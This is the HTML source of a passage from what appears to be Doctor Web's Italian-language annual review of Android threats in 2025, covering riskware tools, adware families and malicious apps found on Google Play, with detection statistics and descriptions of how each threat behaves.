    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare la somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di varie versioni di un'applicazione per la ripresa di foto e video in background attraverso le fotocamere integrate di dispositivi Android. Questo programma può funzionare impercettibilmente consentendo di disattivare le notifiche di registrazione, nonché cambiare con quelle false l'icona e la descrizione dell'app. Tali funzionalità lo rendono potenzialmente pericoloso.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma per il monitoraggio dei proprietari di dispositivi Android. Consente di leggere SMS, ottenere informazioni su chiamate, tracciare la posizione e registrare l'audio dell'ambiente circostante.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Programmi potenzialmente pericolosi&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Nel 2025 sono diventati i software potenzialmente pericolosi più diffusi i programmi modificati tramite lo strumento NP Manager. È un'utility per la modifica di applicazioni, che contiene vari moduli per l'offuscamento e la protezione del codice dei programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. I malintenzionati spesso la adoperano per la protezione di applicazioni malevole in modo da ostacolare il loro rilevamento da parte degli antivirus. La quota di tali programmi, rispetto al 2024, è cresciuta dal 24,52% al 53,59%, ed essi hanno rappresentato già più della metà dei rilevamenti dei software potenzialmente pericolosi. Le varianti riscontrati con la maggiore frequenza sui dispositivi protetti sono &lt;b&gt;Tool.NPMod.3&lt;/b&gt; (32.85%), &lt;b&gt;Tool.NPMod.1&lt;/b&gt; (12.61%), &lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt; (3.02%) e &lt;b&gt;Tool.NPMod.4&lt;/b&gt; (2.31%).&lt;/p&gt;

&lt;p&gt;Dal 3,93% all'8,11% è cresciuto il numero di rilevamenti di &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; — una serie di framework creati per lo sviluppo di applicazioni Android in linguaggio di programmazione Lua. Essi richiedono numerose autorizzazioni di sistema, incluso l'uso del servizio di funzioni di accessibilità di Android. I programmi creati con il loro ausilio sono costruiti su script Lua che sono criptati e vengono decriptati solo immediatamente prima dell'esecuzione. Tali script potenzialmente possono essere malevoli. Dall'8,16% al 10,06% è cresciuta la quota delle applicazioni modificate tramite l'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Questo strumento modifica i programmi installati scaricando da internet script appositamente preparati.&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, la quota delle utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;, che consentono di avviare applicazioni Android senza installazione, è diminuita dal 33,10% al 10,55%. Le varianti della famiglia più frequenti nel 2025 sono stati &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (4.66%), &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2.07%) и &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (1.88%). Inoltre, dal 13,17% al 2,58% è scesa la quota dei programmi protetti dal packer &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni potenzialmente pericolose più diffuse rilevate su dispositivi Android nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a molteplici autorizzazioni di sistema per il funzionamento, tra l'altro, per l'uso del servizio di funzioni di accessibilità di SO Android. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Piattaforma software potenzialmente pericolosa che consente alle applicazioni di avviare i file APK senza la loro installazione. Crea un ambiente di esecuzione virtuale che non influisce sul sistema operativo principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Applicazioni pubblicitarie&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Tra i software pubblicitari, nel 2025 sono state le più diffuse le mod estranee dell'applicazione WhatsApp, rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. In tali varianti è incorporata la funzionalità di apertura di link durante l'uso dell'app di messaggistica. Da questi link viene eseguito il reindirizzamento verso i siti pubblicizzati. Rispetto al 2024, la quota di &lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; del numero totale di applicazioni pubblicitarie rilevate sui dispositivi protetti è scesa dal 47,45% al 26,90%.&lt;/p&gt;

&lt;p&gt;I moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, che vengono incorporati in programmi Android e visualizzano notifiche pubblicitarie, si trovano alla seconda posizione, avendo aumentato l'attività nell'arco dell'anno dal 14,76% al 26,19%. La terza posizione con l'indicatore 8,88% è occupata da esemplari della famiglia &lt;b&gt;Adware.Basement&lt;/b&gt;, la cui quota è rimasta praticamente invariata rispetto all'anno precedente. Tali programmi possono visualizzare annunci pubblicitari che portano a siti malevoli.&lt;/p&gt;

&lt;p&gt;Si sono diffuse anche le famiglie di applicazioni pubblicitarie &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (il numero di rilevamenti è aumentato dal 4,35% al 5,14%), &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (una crescita dal 3,29% al 6,21%), &lt;b&gt;Adware.Youmi&lt;/b&gt; (una crescita dall'1,62% al 2,91%), nonché &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Leadbolt&amp;lng=it"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (una crescita dal 2,26% al 2,41%) e &lt;b&gt;Adware.Jiubang&lt;/b&gt; (una crescita dall'1,70% al 2,38%).&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni pubblicitarie più diffuse rilevate su dispositivi Android nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli pubblicitari che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Youmi&amp;lng=it"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un modulo adware indesiderato che colloca scorciatoie pubblicitarie sulla schermata iniziale di dispostivi Android.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario indesiderato per dispositivi Android, che durante l'installazione di applicazioni visualizza un banner con programmi raccomandati per l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Inmobi&amp;lng=it"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di alcune versioni di un SDK pubblicitario Inmobi, che sono in grado di effettuare telefonate e aggiungere eventi al calendario di dispostivi Android.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Nel 2025 il laboratorio antivirus dell'azienda Doctor Web ha scoperto sullo store di app Google Play oltre 180 programmi malevoli, indesiderati e pubblicitari, che in totale sono stati installati almeno 2.165.040 volte. Includevano, in particolare, le varianti diverse dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, che nascondevano la propria presenza sui dispositivi infetti e visualizzavano la pubblicità sopra l'interfaccia del sistema operativo e di altre applicazioni. Questi trojan venivano distribuiti sotto le apparenze di app di fotoritocco, programmi per la ripresa di foto e video e altri software.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Programmi Time Shift Cam e Fusion Collage Editor erano i trojan pubblicitari &lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Sotto le spoglie dei software ufficiali dello scambio di criptovalute Dydx e delle piattaforme blockchain Raydium e Aerodrome Finance, i cybercriminali distribuivano i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, che rubavano criptovalute.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;In programmi Raydium e Dydx Exchange erano nascosti i software trojan per il furto di criptovalute&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Queste applicazioni malevole suggerivano agli utenti di inserire la frase mnemonica presumibilmente per la connessione di un portafoglio crypto, in realtà però, i dati inseriti venivano trasmessi ai malintenzionati. Per confondere ancora di più le potenziali vittime, i moduli per l'inserimento di frasi mnemoniche potevano essere mascherati da richieste da altre piattaforme crypto.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.CoinSteal.206&lt;/b&gt; visualizza un modulo di phishing presumibilmente a nome dello scambio di criptovalute PancakeSwap e chiede la frase mnemonica per l'accesso al portafoglio crypto&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante l'anno scorso, i nostri specialisti hanno rilevato su Google Play più di 80 applicazioni malevole della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento. Venivano distribuiti sotto le vesti di software diversi, inclusi app di messaggistica, programmi per la fotografia, utility di sistema, editor di immagini e programmi per l'elaborazione di documenti.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di trojan &lt;b&gt;Android.Joker&lt;/b&gt; rilevati: &lt;b&gt;Android.Joker.2494&lt;/b&gt; veniva distribuito come app di messaggistica File Text Messages, e &lt;b&gt;Android.Joker.2496&lt;/b&gt; come utility Useful Cleaner per l'ottimizzazione del funzionamento dello smartphone&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I cybercriminali di nuovo distribuivano gli svariati programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono impiegati in vari schemi di frode. Il loro compito principale è caricare pagine web di destinazione. Una parte di questi trojan i malintenzionati spacciavano per software a tema finanziario. Tali programmi caricavano siti fraudolenti presumibilmente legati a investimenti e guadagno online, nonché siti di phishing. Altri programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; venivano distribuiti con il pretesto di giochi, e a determinate condizioni, potevano caricare siti di casinò online e scommesse. Abbiamo registrato in totale più di 100 tali programmi su Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di applicazioni falsificazione &lt;b&gt;Android.FakeApp&lt;/b&gt;. Trojan &lt;b&gt;Android.FakeApp.1863&lt;/b&gt;, nascosto nel programma TPAO, era orientato agli utenti turchi e suggeriva loro di gestire depositi e redditi. Mentre il trojan &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; veniva distribuito sotto forma di gioco Pino Bounce e poteva caricare un sito di casinò online&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti dei virus Doctor Web hanno rilevato, inoltre, un nuovo software pubblicitario indesiderato, denominato &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt;, che era nascosto nel programma Coin News Promax con informazioni su criptovalute. &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; visualizza notifiche, al clic sulle quali viene caricato in una WebView un link impostato dal server C2.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Applicazione Coin News Promax da Google Play era il software pubblicitario &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre a ciò, i nostri specialisti hanno individuato un programma indesiderato chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; che veniva distribuito con il pretesto di un'app con il nome Zeus Jackpot Mania. Gli utenti ricevevano in esso in forma di gioco premi virtuali che quindi presumibilmente potrebbero convertire in denaro reale e prelevare dall'applicazione.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Programma Zeus Jackpot Mania era l'applicazione indesiderata &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

